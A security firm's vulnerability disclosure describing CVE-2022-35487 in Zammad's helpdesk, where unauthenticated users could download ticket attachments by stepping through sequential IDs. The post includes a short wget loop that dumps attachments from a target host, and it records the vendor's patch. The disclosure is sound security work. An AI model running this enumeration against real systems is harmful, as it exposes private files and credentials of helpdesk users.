During a security test at one of our customers, we came across a web application with integrated helpdesk software. In this context, we identified a critical zero-day vulnerability in Zammad's software. This existed because Zammad did not perform authorization correctly for certain attachment endpoints. This would allow an unauthenticated attacker to gain access to all attachments - such as pictures, emails or other attached files. In this blog post, we describe how the vulnerability was identified and exploited, as well as what caused it.
UPDATE 12.08.2022: The vulnerability has now an official CVE: CVE-2022-35487
Contents
- Background knowledge
- Mapping the Attack Surface
- Exploiting the Vulnerability (Dumping Everything)
- Identifying the Source of the Vulnerability and Mitigation
- Vendor Response
1. Background knowledge
Many companies use some type of helpdesk. That is used to cover support requests both in-house and for end users. We will show how the zero-day vulnerability was identified during our security audit and the extent to which exploitation of this vulnerability is possible.
2. Mapping the Attack Surface
Zammad software is usually protected by authentication that prevents unauthorized users from viewing its contents. In some cases, however, authentication is not required for certain content; the helpdesk logo loaded on the main page, for example, must also be available for unauthenticated users. During testing, we were able to identify several different endpoints in the application that were accessible to an unauthenticated user. Among them were those that could be accessed freely through the application's API path. Any user could interact with the "get attachment" call through the endpoint /api/v1/attachments/:id. We also noticed that the API path requires an ID to access the ticket attachments. Since the IDs are numeric and consecutive, this allowed us to create a complete data dump of the ticket attachments. The vulnerability allows an unauthenticated user to download the helpdesk software's ticket attachments and view its contents. We were furthermore able to obtain internal information about the customer's infrastructure, as well as user credentials and employee email addresses. As a result, an attacker can perform more advanced attacks using the information from the attachments. Potential attack vectors in this case would be social engineering attacks such as phishing, or bypassing authentication procedures using the credentials identified in the attachments.
3. Exploiting the Vulnerability (Dumping Everything)
The following snippet shows the exploit that made it possible to dump the ticket attachments. The exploit consists of a loop that processes all sequence numbers from 1 to 1,000,000, calling ticket attachments. A complete dump of the attachments could be created like that.
#!/bin/sh
for i in $(seq 1 1000000)
do
wget "https://target.zammad.com/api/v1/attachments/$i"
done
4. Identifying the Source of the Vulnerability & Mitigation
The next step was to develop a corresponding mitigation for the identified security vulnerability. For this purpose, the source code of the open source software was analyzed. The code responsible for the leak was identified in the file /app/controllers/attachments_controller.rb.
5. Vendor Response
The vulnerability was immediately reported by our consultants to the provider of the helpdesk software on June 24, 2022. The vendor patched the vulnerability on July 5, 2022 (version 5.2.1). The security patch now ensures that a non-authenticated user is no longer able to call the attachments of the Zammad helpdesk application.
For the ones who are interested, this is their Git commit which fixes the vulnerability.
The publication of the vulnerability can be found at Zammad's advisories page.
Read about other interesting topics on our blog.